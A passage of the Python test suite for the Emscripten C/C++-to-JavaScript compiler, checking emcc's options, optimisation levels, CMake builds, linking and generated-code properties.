Settings.BUILD_AS_SHARED_LIB = 0
Settings.RUNTIME_LINKED_LIBS = []
Settings.EMULATE_UNALIGNED_ACCESSES = int(Settings.USE_TYPED_ARRAYS == 2 and Building.LLVM_OPTS == 2)
Settings.DOUBLE_MODE = 1 if Settings.USE_TYPED_ARRAYS and Building.LLVM_OPTS == 0 else 0
Settings.PRECISE_I64_MATH = 0
Settings.NAMED_GLOBALS = 0 if not embetter else 1
TT.setUp = setUp
return TT
# Make one run with the defaults
default = make_run("default", compiler=CLANG, emcc_args=[])
# Make one run with -O1, with safe heap
o1 = make_run("o1", compiler=CLANG, emcc_args=["-O1", "-s", "ASM_JS=0", "-s", "SAFE_HEAP=1"])
# Make one run with -O2, but without closure (we enable closure in specific tests, otherwise on everything it is too slow)
o2 = make_run("o2", compiler=CLANG, emcc_args=["-O2", "-s", "ASM_JS=0", "-s", "JS_CHUNK_SIZE=1024"])
# asm.js
asm1 = make_run("asm1", compiler=CLANG, emcc_args=["-O1", "-s", "CHECK_HEAP_ALIGN=1"])
asm2 = make_run("asm2", compiler=CLANG, emcc_args=["-O2"])
asm2g = make_run("asm2g", compiler=CLANG, emcc_args=["-O2", "-g", "-s", "ASSERTIONS=1", "--memory-init-file", "1"])
asm2x86 = make_run("asm2x86", compiler=CLANG, emcc_args=["-O2", "-g", "-s", "CHECK_HEAP_ALIGN=1"], env={"EMCC_LLVM_TARGET": "i386-pc-linux-gnu"})
# Make custom runs with various options
for compiler, quantum, embetter, typed_arrays in [
(CLANG, 4, 0, 0),
(CLANG, 4, 1, 1),
]:
fullname = 's_0_%d%s%s' % (
embetter, '' if quantum == 4 else '_q' + str(quantum), '' if typed_arrays in [0, 1] else '_t' + str(typed_arrays)
)
locals()[fullname] = make_run(fullname, fullname, compiler, embetter, quantum, typed_arrays)
del T # T is just a shape for the specific subclasses, we don't test it itself
class other(RunnerCore):
def test_emcc(self):
for compiler in [EMCC, EMXX]:
shortcompiler = os.path.basename(compiler)
suffix = '.c' if compiler == EMCC else '.cpp'
# --version
output = Popen([PYTHON, compiler, '--version'], stdout=PIPE, stderr=PIPE).communicate()
output = output[0].replace('\r', '')
self.assertContained('''emcc (Emscripten GCC-like replacement)''', output)
self.assertContained('''Copyright (C) 2013 the Emscripten authors (see AUTHORS.txt)
This is free and open source software under the MIT license.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
''', output)
# -v, without input files
output = Popen([PYTHON, compiler, '-v'], stdout=PIPE, stderr=PIPE).communicate()
self.assertContained('''clang version''', output[1].replace('\r', ''), output[1].replace('\r', ''))
# --help
output = Popen([PYTHON, compiler, '--help'], stdout=PIPE, stderr=PIPE).communicate()
self.assertContained('''%s [options] file...
Most normal gcc/g++ options will work, for example:
--help Display this information
--version Display compiler version information
Options that are modified or new in %s include:
-O0 No optimizations (default)
''' % (shortcompiler, shortcompiler), output[0].replace('\r', ''), output[1].replace('\r', ''))
# emcc src.cpp ==> writes a.out.js
self.clear()
output = Popen([PYTHON, compiler, path_from_root('tests', 'hello_world' + suffix)], stdout=PIPE, stderr=PIPE).communicate()
assert len(output[0]) == 0, output[0]
assert os.path.exists('a.out.js'), '\n'.join(output)
self.assertContained('hello, world!', run_js('a.out.js'))
# properly report source code errors, and stop there
self.clear()
assert not os.path.exists('a.out.js')
process = Popen([PYTHON, compiler, path_from_root('tests', 'hello_world_error' + suffix)], stdout=PIPE, stderr=PIPE)
output = process.communicate()
assert not os.path.exists('a.out.js'), 'compilation failed, so no output file is expected'
assert len(output[0]) == 0, output[0]
assert process.returncode is not 0, 'Failed compilation must return a nonzero error code!'
self.assertNotContained('IOError', output[1]) # no python stack
self.assertNotContained('Traceback', output[1]) # no python stack
self.assertContained('error: invalid preprocessing directive', output[1])
self.assertContained(["error: use of undeclared identifier 'cheez", "error: unknown type name 'cheez'"], output[1])
self.assertContained('errors generated', output[1])
assert 'compiler frontend failed to generate LLVM bitcode, halting' in output[1].split('errors generated.')[1]
# emcc src.cpp -c and emcc src.cpp -o src.[o|bc] ==> should give a .bc file
# regression check: -o js should create "js", with bitcode content
for args in [['-c'], ['-o', 'src.o'], ['-o', 'src.bc'], ['-o', 'src.so'], ['-o', 'js']]:
target = args[1] if len(args) == 2 else 'hello_world.o'
self.clear()
Popen([PYTHON, compiler, path_from_root('tests', 'hello_world' + suffix)] + args, stdout=PIPE, stderr=PIPE).communicate()
syms = Building.llvm_nm(target)
assert len(syms.defs) == 1 and 'main' in syms.defs, 'Failed to generate valid bitcode'
if target == 'js': # make sure emcc can recognize the target as a bitcode file
shutil.move(target, target + '.bc')
target += '.bc'
output = Popen([PYTHON, compiler, target, '-o', target + '.js'], stdout = PIPE, stderr = PIPE).communicate()
assert len(output[0]) == 0, output[0]
assert os.path.exists(target + '.js'), 'Expected %s to exist since args are %s : %s' % (target + '.js', str(args), '\n'.join(output))
self.assertContained('hello, world!', run_js(target + '.js'))
# handle singleton archives
self.clear()
Popen([PYTHON, compiler, path_from_root('tests', 'hello_world' + suffix), '-o', 'a.bc'], stdout=PIPE, stderr=PIPE).communicate()
Popen([LLVM_AR, 'r', 'a.a', 'a.bc'], stdout=PIPE, stderr=PIPE).communicate()
assert os.path.exists('a.a')
output = Popen([PYTHON, compiler, 'a.a']).communicate()
assert os.path.exists('a.out.js'), output
self.assertContained('hello, world!', run_js('a.out.js'))
# emcc src.ll ==> generates .js
self.clear()
output = Popen([PYTHON, compiler, path_from_root('tests', 'hello_world.ll')], stdout=PIPE, stderr=PIPE).communicate()
assert len(output[0]) == 0, output[0]
assert os.path.exists('a.out.js'), '\n'.join(output)
self.assertContained('hello, world!', run_js('a.out.js'))
# emcc [..] -o [path] ==> should work with absolute paths
try:
for path in [os.path.abspath(os.path.join('..', 'file1.js')), os.path.join('b_dir', 'file2.js')]:
print path
self.clear(in_curr=True)
os.chdir(self.get_dir())
if not os.path.exists('a_dir'): os.mkdir('a_dir')
os.chdir('a_dir')
if not os.path.exists('b_dir'): os.mkdir('b_dir')
output = Popen([PYTHON, compiler, path_from_root('tests', 'hello_world.ll'), '-o', path], stdout=PIPE, stderr=PIPE).communicate()
print output
assert os.path.exists(path), path + ' does not exist; ' + '\n'.join(output)
last = os.getcwd()
os.chdir(os.path.dirname(path))
self.assertContained('hello, world!', run_js(os.path.basename(path)))
os.chdir(last)
finally:
os.chdir(self.get_dir())
self.clear()
# dlmalloc. dlmalloc is special in that it is the only part of libc that is (1) hard to write well, and
# very speed-sensitive. So we do not implement it in JS in library.js, instead we compile it from source
for source, has_malloc in [('hello_world' + suffix, False), ('hello_malloc.cpp', True)]:
print source, has_malloc
self.clear()
output = Popen([PYTHON, compiler, path_from_root('tests', source)], stdout=PIPE, stderr=PIPE).communicate()
assert os.path.exists('a.out.js'), '\n'.join(output)
self.assertContained('hello, world!', run_js('a.out.js'))
generated = open('a.out.js').read()
assert ('function _malloc(bytes) {' in generated) == (not has_malloc), 'If malloc is needed, it should be there, if not not'
# Optimization: emcc src.cpp -o something.js [-Ox]. -O0 is the same as not specifying any optimization setting
for params, opt_level, bc_params, closure, has_malloc in [ # bc params are used after compiling to bitcode
(['-o', 'something.js'], 0, None, 0, 1),
(['-o', 'something.js', '-O0'], 0, None, 0, 0),
(['-o', 'something.js', '-O1'], 1, None, 0, 0),
(['-o', 'something.js', '-O1', '-g'], 1, None, 0, 0), # no closure since debug
(['-o', 'something.js', '-O1', '--closure', '1'], 1, None, 1, 0),
(['-o', 'something.js', '-O1', '--closure', '1', '-s', 'ASM_JS=0'], 1, None, 1, 0),
(['-o', 'something.js', '-O2'], 2, None, 0, 1),
(['-o', 'something.js', '-O2', '-g'], 2, None, 0, 0),
(['-o', 'something.js', '-Os'], 2, None, 0, 1),
(['-o', 'something.js', '-O3', '-s', 'ASM_JS=0'], 3, None, 1, 1),
# and, test compiling to bitcode first
(['-o', 'something.bc'], 0, [], 0, 0),
(['-o', 'something.bc', '-O0'], 0, [], 0, 0),
(['-o', 'something.bc', '-O1'], 1, ['-O1'], 0, 0),
(['-o', 'something.bc', '-O2'], 2, ['-O2'], 0, 0),
(['-o', 'something.bc', '-O3'], 3, ['-O3', '-s', 'ASM_JS=0'], 1, 0),
(['-O1', '-o', 'something.bc'], 1, [], 0, 0),
]:
print params, opt_level, bc_params, closure, has_malloc
self.clear()
keep_debug = '-g' in params
args = [PYTHON, compiler, path_from_root('tests', 'hello_world_loop' + ('_malloc' if has_malloc else '') + '.cpp')] + params
print '..', args
output = Popen(args,
stdout=PIPE, stderr=PIPE).communicate()
assert len(output[0]) == 0, output[0]
if bc_params is not None:
assert os.path.exists('something.bc'), output[1]
bc_args = [PYTHON, compiler, 'something.bc', '-o', 'something.js'] + bc_params
print '....', bc_args
output = Popen(bc_args, stdout=PIPE, stderr=PIPE).communicate()
assert os.path.exists('something.js'), output[1]
assert ('Applying some potentially unsafe optimizations!' in output[1]) == (opt_level >= 3), 'unsafe warning should appear in opt >= 3'
self.assertContained('hello, world!', run_js('something.js'))
# Verify optimization level etc. in the generated code
# XXX these are quite sensitive, and will need updating when code generation changes
generated = open('something.js').read() # TODO: parse out the _main function itself, not support code, if the tests below need that some day
assert 'new Uint16Array' in generated and 'new Uint32Array' in generated, 'typed arrays 2 should be used by default'
assert 'SAFE_HEAP' not in generated, 'safe heap should not be used by default'
assert ': while(' not in generated, 'when relooping we also js-optimize, so there should be no labelled whiles'
if closure:
if opt_level == 0: assert 'Module._main =' in generated, 'closure compiler should have been run'
elif opt_level >= 1: assert 'Module._main=' in generated, 'closure compiler should have been run (and output should be minified)'
else:
# closure has not been run, we can do some additional checks. TODO: figure out how to do these even with closure
assert 'Module._main = ' not in generated, 'closure compiler should not have been run'
if keep_debug:
assert ('(label)' in generated or '(label | 0)' in generated) == (opt_level <= 1), 'relooping should be in opt >= 2'
assert ('assert(STACKTOP < STACK_MAX' in generated) == (opt_level == 0), 'assertions should be in opt == 0'
assert 'var $i;' in generated or 'var $i_0' in generated or 'var $storemerge3;' in generated or 'var $storemerge4;' in generated or 'var $i_04;' in generated or 'var $original = 0' in generated, 'micro opts should always be on'
if opt_level >= 2 and '-g' in params:
assert re.search('HEAP8\[\$?\w+ ?\+ ?\(+\$?\w+ ?', generated) or re.search('HEAP8\[HEAP32\[', generated), 'eliminator should create compound expressions, and fewer one-time vars' # also in -O1, but easier to test in -O2
assert ('_puts(' in generated) == (opt_level >= 1), 'with opt >= 1, llvm opts are run and they should optimize printf to puts'
if opt_level == 0 or '-g' in params: assert 'function _main() {' in generated, 'Should be unminified, including whitespace'
elif opt_level >= 2: assert ('function _main(){' in generated or '"use asm";var a=' in generated), 'Should be whitespace-minified'
# emcc -s RELOOP=1 src.cpp ==> should pass -s to emscripten.py. --typed-arrays is a convenient alias for -s USE_TYPED_ARRAYS
for params, test, text in [
(['-O2'], lambda generated: 'function intArrayToString' in generated, 'shell has unminified utilities'),
(['-O2', '--closure', '1'], lambda generated: 'function intArrayToString' not in generated, 'closure minifies the shell'),
(['-O2'], lambda generated: 'var b=0' in generated and not 'function _main' in generated, 'registerize/minify is run by default in -O2'),
(['-O2', '--minify', '0'], lambda generated: 'var b = 0' in generated and not 'function _main' in generated, 'minify is cancelled, but not registerize'),
(['-O2', '-g'], lambda generated: 'var b=0' not in generated and 'var b = 0' not in generated and 'function _main' in generated, 'registerize/minify is cancelled by -g'),
(['-O2', '-g0'], lambda generated: 'var b=0' in generated and not 'function _main' in generated, 'registerize/minify is run by default in -O2 -g0'),
(['-O2', '-g1'], lambda generated: 'var b = 0' in generated and not 'function _main' in generated, 'compress is cancelled by -g1'),
(['-O2', '-g2'], lambda generated: ('var b = 0' in generated or 'var i1 = 0' in generated) and 'function _main' in generated, 'minify is cancelled by -g2'),
(['-O2', '-g3'], lambda generated: 'var b=0' not in generated and 'var b = 0' not in generated and 'function _main' in generated, 'registerize is cancelled by -g3'),
#(['-O2', '-g4'], lambda generated: 'var b=0' not in generated and 'var b = 0' not in generated and 'function _main' in generated, 'same as -g3 for now'),
(['-s', 'INLINING_LIMIT=0'], lambda generated: 'function _dump' in generated, 'no inlining without opts'),
(['-O3', '-s', 'INLINING_LIMIT=0', '--closure', '0'], lambda generated: 'function _dump' not in generated, 'lto/inlining'),
(['-Os', '--llvm-lto', '1', '-s', 'ASM_JS=0'], lambda generated: 'function _dump' in generated, '-Os disables inlining'),
(['-s', 'USE_TYPED_ARRAYS=0'], lambda generated: 'new Int32Array' not in generated, 'disable typed arrays'),
(['-s', 'USE_TYPED_ARRAYS=1'], lambda generated: 'IHEAPU = ' in generated, 'typed arrays 1 selected'),
([], lambda generated: 'Module["_dump"]' not in generated, 'dump is not exported by default'),
(['-s', 'EXPORTED_FUNCTIONS=["_main", "_dump"]'], lambda generated: 'Module["_dump"]' in generated, 'dump is now exported'),
(['--typed-arrays', '0'], lambda generated: 'new Int32Array' not in generated, 'disable typed arrays'),
(['--typed-arrays', '1'], lambda generated: 'IHEAPU = ' in generated, 'typed arrays 1 selected'),
(['--typed-arrays', '2'], lambda generated: 'new Uint16Array' in generated and 'new Uint32Array' in generated, 'typed arrays 2 selected'),
(['--llvm-opts', '1'], lambda generated: '_puts(' in generated, 'llvm opts requested'),
]:
print params, text
self.clear()
output = Popen([PYTHON, compiler, path_from_root('tests', 'hello_world_loop.cpp'), '-o', 'a.out.js'] + params, stdout=PIPE, stderr=PIPE).communicate()
assert len(output[0]) == 0, output[0]
assert os.path.exists('a.out.js'), '\n'.join(output)
self.assertContained('hello, world!', run_js('a.out.js'))
assert test(open('a.out.js').read()), text
# Compiling two source files into a final JS.
for args, target in [([], 'a.out.js'), (['-o', 'combined.js'], 'combined.js')]:
self.clear()
output = Popen([PYTHON, compiler, path_from_root('tests', 'twopart_main.cpp'), path_from_root('tests', 'twopart_side.cpp')] + args,
stdout=PIPE, stderr=PIPE).communicate()
assert len(output[0]) == 0, output[0]
assert os.path.exists(target), '\n'.join(output)
self.assertContained('side got: hello from main, over', run_js(target))
# Compiling two files with -c will generate separate .bc files
self.clear()
output = Popen([PYTHON, compiler, path_from_root('tests', 'twopart_main.cpp'), path_from_root('tests', 'twopart_side.cpp'), '-c'] + args,
stdout=PIPE, stderr=PIPE).communicate()
if '-o' in args:
# specifying -o and -c is an error
assert 'fatal error' in output[1], output[1]
continue
assert os.path.exists('twopart_main.o'), '\n'.join(output)
assert os.path.exists('twopart_side.o'), '\n'.join(output)
assert not os.path.exists(target), 'We should only have created bitcode here: ' + '\n'.join(output)
# Compiling one of them alone is expected to fail
output = Popen([PYTHON, compiler, 'twopart_main.o', '-O1', '-g'] + args, stdout=PIPE, stderr=PIPE).communicate()
assert os.path.exists(target), '\n'.join(output)
#print '\n'.join(output)
self.assertContained('missing function', run_js(target, stderr=STDOUT))
try_delete(target)
# Combining those bc files into js should work
output = Popen([PYTHON, compiler, 'twopart_main.o', 'twopart_side.o'] + args, stdout=PIPE, stderr=PIPE).communicate()
assert os.path.exists(target), '\n'.join(output)
self.assertContained('side got: hello from main, over', run_js(target))
# Combining bc files into another bc should also work
try_delete(target)
assert not os.path.exists(target)
output = Popen([PYTHON, compiler, 'twopart_main.o', 'twopart_side.o', '-o', 'combined.bc'] + args, stdout=PIPE, stderr=PIPE).communicate()
syms = Building.llvm_nm('combined.bc')
assert len(syms.defs) == 2 and 'main' in syms.defs, 'Failed to generate valid bitcode'
output = Popen([PYTHON, compiler, 'combined.bc', '-o', 'combined.bc.js'], stdout = PIPE, stderr = PIPE).communicate()
assert len(output[0]) == 0, output[0]
assert os.path.exists('combined.bc.js'), 'Expected %s to exist' % ('combined.bc.js')
self.assertContained('side got: hello from main, over', run_js('combined.bc.js'))
# --js-transform <transform>
self.clear()
trans = os.path.join(self.get_dir(), 't.py')
trans_file = open(trans, 'w')
trans_file.write('''
import sys
f = open(sys.argv[1], 'w')
f.write('transformed!')
f.close()
''')
trans_file.close()
output = Popen([PYTHON, compiler, path_from_root('tests', 'hello_world' + suffix), '--js-transform', '%s t.py' % (PYTHON)], stdout=PIPE, stderr=PIPE).communicate()
assert open('a.out.js').read() == 'transformed!', 'Transformed output must be as expected'
# TODO: Add in files test a clear example of using disablePermissions, and link to it from the wiki
# TODO: test normal project linking, static and dynamic: get_library should not need to be told what to link!
# TODO: deprecate llvm optimizations, dlmalloc, etc. in emscripten.py.
def test_cmake(self):
# On Windows, we want to build cmake-generated Makefiles with mingw32-make instead of e.g. cygwin make, since mingw32-make
# understands Windows paths, and cygwin make additionally produces a cryptic 'not valid bitcode file' errors on files that
# *are* valid bitcode files.
if os.name == 'nt':
make_command = 'mingw32-make'
emscriptencmaketoolchain = path_from_root('cmake', 'Platform', 'Emscripten.cmake')
else:
make_command = 'make'
emscriptencmaketoolchain = path_from_root('cmake', 'Platform', 'Emscripten_unix.cmake')
cmake_cases = ['target_js', 'target_html']
cmake_outputs = ['hello_world.js', 'hello_world_gles.html']
for i in range(0, 2):
for configuration in ['Debug', 'Release']:
# Create a temp workspace folder
cmakelistsdir = path_from_root('tests', 'cmake', cmake_cases[i])
tempdirname = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=TEMP_DIR)
try:
os.chdir(tempdirname)
# Run Cmake
cmd = ['cmake', '-DCMAKE_TOOLCHAIN_FILE='+emscriptencmaketoolchain,
'-DCMAKE_BUILD_TYPE=' + configuration,
'-DCMAKE_MODULE_PATH=' + path_from_root('cmake').replace('\\', '/'),
'-G' 'Unix Makefiles', cmakelistsdir]
ret = Popen(cmd, stdout=PIPE, stderr=PIPE).communicate()
if ret[1] != None and len(ret[1].strip()) > 0:
print >> sys.stderr, ret[1] # If there were any errors, print them directly to console for diagnostics.
if 'error' in ret[1].lower():
print >> sys.stderr, 'Failed command: ' + ' '.join(cmd)
print >> sys.stderr, 'Result:\n' + ret[1]
raise Exception('cmake call failed!')
assert os.path.exists(tempdirname + '/Makefile'), 'CMake call did not produce a Makefile!'
# Build
cmd = [make_command]
ret = Popen(cmd, stdout=PIPE).communicate()
if ret[1] != None and len(ret[1].strip()) > 0:
print >> sys.stderr, ret[1] # If there were any errors, print them directly to console for diagnostics.
if 'error' in ret[0].lower() and not '0 error(s)' in ret[0].lower():
print >> sys.stderr, 'Failed command: ' + ' '.join(cmd)
print >> sys.stderr, 'Result:\n' + ret[0]
raise Exception('make failed!')
assert os.path.exists(tempdirname + '/' + cmake_outputs[i]), 'Building a cmake-generated Makefile failed to produce an output file %s!' % tempdirname + '/' + cmake_outputs[i]
# Run through node, if CMake produced a .js file.
if cmake_outputs[i].endswith('.js'):
ret = Popen(listify(NODE_JS) + [tempdirname + '/' + cmake_outputs[i]], stdout=PIPE).communicate()[0]
assert 'hello, world!' in ret, 'Running cmake-based .js application failed!'
finally:
os.chdir(path_from_root('tests')) # Move away from the directory we are about to remove.
shutil.rmtree(tempdirname)
def test_failure_error_code(self):
for compiler in [EMCC, EMXX]:
# Test that if one file is missing from the build, then emcc shouldn't succeed, and shouldn't try to produce an output file.
process = Popen([PYTHON, compiler, path_from_root('tests', 'hello_world.c'), 'this_file_is_missing.c', '-o', 'this_output_file_should_never_exist.js'], stdout=PIPE, stderr=PIPE)
process.communicate()
assert process.returncode is not 0, 'Trying to compile a nonexisting file should return with a nonzero error code!'
assert os.path.exists('this_output_file_should_never_exist.js') == False, 'Emcc should not produce an output file when build fails!'
def test_cxx03(self):
for compiler in [EMCC, EMXX]:
process = Popen([PYTHON, compiler, path_from_root('tests', 'hello_cxx03.cpp')], stdout=PIPE, stderr=PIPE)
process.communicate()
assert process.returncode is 0, 'By default, emscripten should build using -std=c++03!'
def test_cxx11(self):
for compiler in [EMCC, EMXX]:
process = Popen([PYTHON, compiler, '-std=c++11', path_from_root('tests', 'hello_cxx11.cpp')], stdout=PIPE, stderr=PIPE)
process.communicate()
assert process.returncode is 0, 'User should be able to specify custom -std= on the command line!'
def test_catch_undef(self):
open(os.path.join(self.get_dir(), 'test.cpp'), 'w').write(r'''
#include <vector>
#include <stdio.h>
class Test {
public:
std::vector<int> vector;
};
Test globalInstance;
int main() {
printf("hello, world!\n");
return 0;
}
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'test.cpp'), '-fsanitize=undefined']).communicate()
self.assertContained('hello, world!', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_unaligned_memory(self):
open(os.path.join(self.get_dir(), 'test.cpp'), 'w').write(r'''
#include <stdio.h>
typedef unsigned char Bit8u;
typedef unsigned short Bit16u;
typedef unsigned int Bit32u;
int main()
{
Bit8u data[4] = {0x01,0x23,0x45,0x67};
printf("data: %x\n", *(Bit32u*)data);
printf("data[0,1] 16bit: %x\n", *(Bit16u*)data);
printf("data[1,2] 16bit: %x\n", *(Bit16u*)(data+1));
}
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'test.cpp'), '-s', 'UNALIGNED_MEMORY=1']).communicate()
self.assertContained('data: 67452301\ndata[0,1] 16bit: 2301\ndata[1,2] 16bit: 4523', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_unaligned_memory_2(self):
open(os.path.join(self.get_dir(), 'test.cpp'), 'w').write(r'''
#include <string>
#include <stdio.h>
int main( int argc, char ** argv )
{
std::string testString( "Hello, World!" );
printf( "testString = %s\n", testString.c_str() );
return 0;
}
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'test.cpp'), '-s', 'UNALIGNED_MEMORY=1']).communicate()
self.assertContained('testString = Hello, World!', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_asm_minify(self):
def test(args):
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_loop_malloc.cpp')] + args).communicate()
self.assertContained('hello, world!', run_js(self.in_dir('a.out.js')))
return open(self.in_dir('a.out.js')).read()
src = test([])
assert 'function _malloc' in src
src = test(['-O2', '-s', 'ASM_JS=1'])
normal_size = len(src)
print 'normal', normal_size
assert 'function _malloc' not in src
src = test(['-O2', '-s', 'ASM_JS=1', '--minify', '0'])
unminified_size = len(src)
print 'unminified', unminified_size
assert unminified_size > normal_size
assert 'function _malloc' not in src
src = test(['-O2', '-s', 'ASM_JS=1', '-g'])
debug_size = len(src)
print 'debug', debug_size
assert debug_size > unminified_size
assert 'function _malloc' in src
def test_dangerous_func_cast(self):
src = r'''
#include <stdio.h>
typedef void (*voidfunc)();
int my_func() {
printf("my func\n");
return 10;
}
int main(int argc, char **argv) {
voidfunc fps[10];
for (int i = 0; i < 10; i++) fps[i] = (i == argc) ? (void (*)())my_func : NULL;
fps[2*(argc-1) + 1]();
return 0;
}
'''
open('src.c', 'w').write(src)
def test(args, expected, err_expected=None):
out, err = Popen([PYTHON, EMCC, 'src.c'] + args, stderr=PIPE).communicate()
if err_expected: self.assertContained(err_expected, err)
self.assertContained(expected, run_js(self.in_dir('a.out.js'), stderr=PIPE, full_output=True))
return open(self.in_dir('a.out.js')).read()
test([], 'my func') # no asm, so casting func works
test(['-O2'], 'abort', ['Casting potentially incompatible function pointer i32 ()* to void (...)*, for my_func',
'Incompatible function pointer casts are very dangerous with ASM_JS=1, you should investigate and correct these']) # asm, so failure
test(['-O2', '-s', 'ASSERTIONS=1'],
'Invalid function pointer called. Perhaps a miscast function pointer (check compilation warnings) or bad vtable lookup (maybe due to derefing a bad pointer, like NULL)?',
['Casting potentially incompatible function pointer i32 ()* to void (...)*, for my_func',
'Incompatible function pointer casts are very dangerous with ASM_JS=1, you should investigate and correct these']) # asm, so failure
def test_l_link(self):
# Linking with -lLIBNAME and -L/DIRNAME should work
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write('''
extern void printey();
int main() {
printey();
return 0;
}
''')
try:
os.makedirs(os.path.join(self.get_dir(), 'libdir'));
except:
pass
open(os.path.join(self.get_dir(), 'libdir', 'libfile.cpp'), 'w').write('''
#include <stdio.h>
void printey() {
printf("hello from lib\\n");
}
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'libdir', 'libfile.cpp'), '-c']).communicate()
shutil.move(os.path.join(self.get_dir(), 'libfile.o'), os.path.join(self.get_dir(), 'libdir', 'libfile.so'))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '-L' + os.path.join(self.get_dir(), 'libdir'), '-lfile']).communicate()
self.assertContained('hello from lib', run_js(os.path.join(self.get_dir(), 'a.out.js')))
assert not os.path.exists('a.out') and not os.path.exists('a.exe'), 'Must not leave unneeded linker stubs'
def test_static_link(self):
def test(name, header, main, side, expected, args=[], suffix='cpp', first=True):
print name
#t = main ; main = side ; side = t
original_main = main
original_side = side
if header: open(os.path.join(self.get_dir(), 'header.h'), 'w').write(header)
if type(main) == str:
open(os.path.join(self.get_dir(), 'main.' + suffix), 'w').write(main)
main = ['main.' + suffix]
if type(side) == str:
open(os.path.join(self.get_dir(), 'side.' + suffix), 'w').write(side)
side = ['side.' + suffix]
Popen([PYTHON, EMCC] + side + ['-o', 'side.js', '-s', 'SIDE_MODULE=1', '-O2'] + args).communicate()
# TODO: test with and without DISABLE_GL_EMULATION, check that file sizes change
Popen([PYTHON, EMCC] + main + ['-o', 'main.js', '-s', 'MAIN_MODULE=1', '-O2', '-s', 'DISABLE_GL_EMULATION=1'] + args).communicate()
Popen([PYTHON, EMLINK, 'main.js', 'side.js', 'together.js'], stdout=PIPE).communicate()
assert os.path.exists('together.js')
for engine in JS_ENGINES:
out = run_js('together.js', engine=engine, stderr=PIPE, full_output=True)
self.assertContained(expected, out)
if engine == SPIDERMONKEY_ENGINE: self.validate_asmjs(out)
if first:
shutil.copyfile('together.js', 'first.js')
test(name + ' (reverse)', header, original_side, original_main, expected, args, suffix, False) # test reverse order
# test a simple call from one module to another. only one has a string (and constant memory initialization for it)
test('basics', '', '''
#include <stdio.h>
extern int sidey();
int main() {
printf("other says %d.", sidey());
return 0;
}
''', '''
int sidey() { return 11; }
''', 'other says 11.')
# finalization of float variables should pass asm.js validation
test('floats', '', '''
#include <stdio.h>
extern float sidey();
int main() {
printf("other says %.2f.", sidey()+1);
return 0;
}
''', '''
float sidey() { return 11.5; }
''', 'other says 12.50')
# memory initialization in both
test('multiple memory inits', '', r'''
#include <stdio.h>
extern void sidey();
int main() {
printf("hello from main\n");
sidey();
return 0;
}
''', r'''
#include <stdio.h>
void sidey() { printf("hello from side\n"); }
''', 'hello from main\nhello from side\n')
# function pointers
test('fp1', 'typedef void (*voidfunc)();', r'''
#include <stdio.h>
#include "header.h"
voidfunc sidey(voidfunc f);
void a() { printf("hello from funcptr\n"); }
int main() {
sidey(a)();
return 0;
}
''', '''
#include "header.h"
voidfunc sidey(voidfunc f) { return f; }
''', 'hello from funcptr\n')
# Global initializer
test('global init', '', r'''
#include <stdio.h>
struct Class {
Class() { printf("a new Class\n"); }
};
static Class c;
int main() {
return 0;
}
''', r'''
void nothing() {}
''', 'a new Class\n')
# Multiple global initializers (LLVM generates overlapping names for them)
test('global inits', r'''
#include <stdio.h>
struct Class {
Class(const char *name) { printf("new %s\n", name); }
};
''', r'''
#include "header.h"
static Class c("main");
int main() {
return 0;
}
''', r'''
#include "header.h"
static Class c("side");
''', ['new main\nnew side\n', 'new side\nnew main\n'])
# Class code used across modules
test('codecall', r'''
#include <stdio.h>
struct Class {
Class(const char *name);
};
''', r'''
#include "header.h"
int main() {
Class c("main");
return 0;
}
''', r'''
#include "header.h"
Class::Class(const char *name) { printf("new %s\n", name); }
''', ['new main\n'])
# malloc usage in both modules
test('malloc', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
''', r'''
#include <stdio.h>
#include "header.h"
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
puts(ret);
return 0;
}
''', r'''
#include "header.h"
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''', ['hello through side\n'])
# libc usage in one modules. must force libc inclusion in the main module if that isn't the one using mallinfo()
try:
os.environ['EMCC_FORCE_STDLIBS'] = 'libc'
test('malloc-1', r'''
#include <string.h>
int side();
''', r'''
#include <stdio.h>
#include "header.h"
int main() {
printf("|%d|\n", side());
return 0;
}
''', r'''
#include <stdlib.h>
#include <malloc.h>
#include "header.h"
int side() {
struct mallinfo m = mallinfo();
return m.arena > 1;
}
''', ['|1|\n'])
finally:
del os.environ['EMCC_FORCE_STDLIBS']
# iostream usage in one and std::string in both
test('iostream', r'''
#include <iostream>
#include <string>
std::string side();
''', r'''
#include "header.h"
int main() {
std::cout << "hello from main " << side() << std::endl;
return 0;
}
''', r'''
#include "header.h"
std::string side() { return "and hello from side"; }
''', ['hello from main and hello from side\n'])
# zlib compression library. tests function pointers in initializers and many other things
test('zlib', '', open(path_from_root('tests', 'zlib', 'example.c'), 'r').read(),
self.get_library('zlib', os.path.join('libz.a'), make_args=['libz.a']),
open(path_from_root('tests', 'zlib', 'ref.txt'), 'r').read(),
args=['-I' + path_from_root('tests', 'zlib')], suffix='c')
# bullet physics engine. tests all the things
test('bullet', '', open(path_from_root('tests', 'bullet', 'Demos', 'HelloWorld', 'HelloWorld.cpp'), 'r').read(),
self.get_library('bullet', [os.path.join('src', '.libs', 'libBulletDynamics.a'),
os.path.join('src', '.libs', 'libBulletCollision.a'),
os.path.join('src', '.libs', 'libLinearMath.a')]),
[open(path_from_root('tests', 'bullet', 'output.txt'), 'r').read(), # different roundings
open(path_from_root('tests', 'bullet', 'output2.txt'), 'r').read(),
open(path_from_root('tests', 'bullet', 'output3.txt'), 'r').read()],
args=['-I' + path_from_root('tests', 'bullet', 'src')])
def test_symlink(self):
if os.name == 'nt':
return self.skip('Windows FS does not need to be tested for symlinks support, since it does not have them.')
